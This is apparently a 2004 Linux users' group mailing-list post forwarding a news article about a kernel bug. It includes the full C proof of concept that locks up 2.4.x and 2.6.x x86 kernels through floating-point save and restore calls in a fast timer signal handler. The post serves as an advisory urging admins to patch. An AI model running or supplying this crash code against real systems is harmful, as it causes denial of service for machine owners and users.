----- Original Message -----
From: "Anand Kumar Saha" anand.kumar@gavsin.com
To: ilugc@ae.iitm.ac.in
Sent: Thursday, June 17, 2004 2:25 PM
Subject: [Ilugc] [IMP] C code that crashes linux kernel!
hi group,
don't know why this news didn't make much noise. a small C code, which when compiled and run crashes the kernel. i tried to compile and run this over ssh, and it crashed my ssh session as well as the ssh server.
admins make sure you apply the proper patches.
http://reviewed.homelinux.org/news/2004-06-11_kernel_crash/index.html.en
<FROM THE WEBSITE>
New Kernel Crash-Exploit discovered
Published 2004-06-11 by xiando, v2.3.0, last updated 2004-06-15.
A bug lets a simple C program crash the Linux kernel, effectively locking the whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture.
The kernel is the most important part of the Linux operating system. It handles communication with the computer's hardware and decides the priority of running programs (processes). If the kernel stops doing its job, everything else will too.
The Evil Code
Running this simple C program crashes the Linux kernel.
crash.c.txt
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void Handler(int ignore)
{
    char fpubuf[108];
    __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
    struct itimerval spec;
    signal(SIGALRM, Handler);
    spec.it_interval.tv_sec=0;
    spec.it_interval.tv_usec=100;
    spec.it_value.tv_sec=0;
    spec.it_value.tv_usec=100;
    setitimer(ITIMER_REAL, &spec, NULL);
    while(1)
        write(1, ".", 1);

    return 0;
}
This bug is confirmed to be present when the code is compiled with GCC version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel versions 2.4.2x and 2.6.x on x86 and amd64 systems.
[ .. SNIP .. ]
</FROM THE WEBSITE>
saha
--
Rohit Baisakhiya PH-9869265724
http://linux.kiraninfotech.com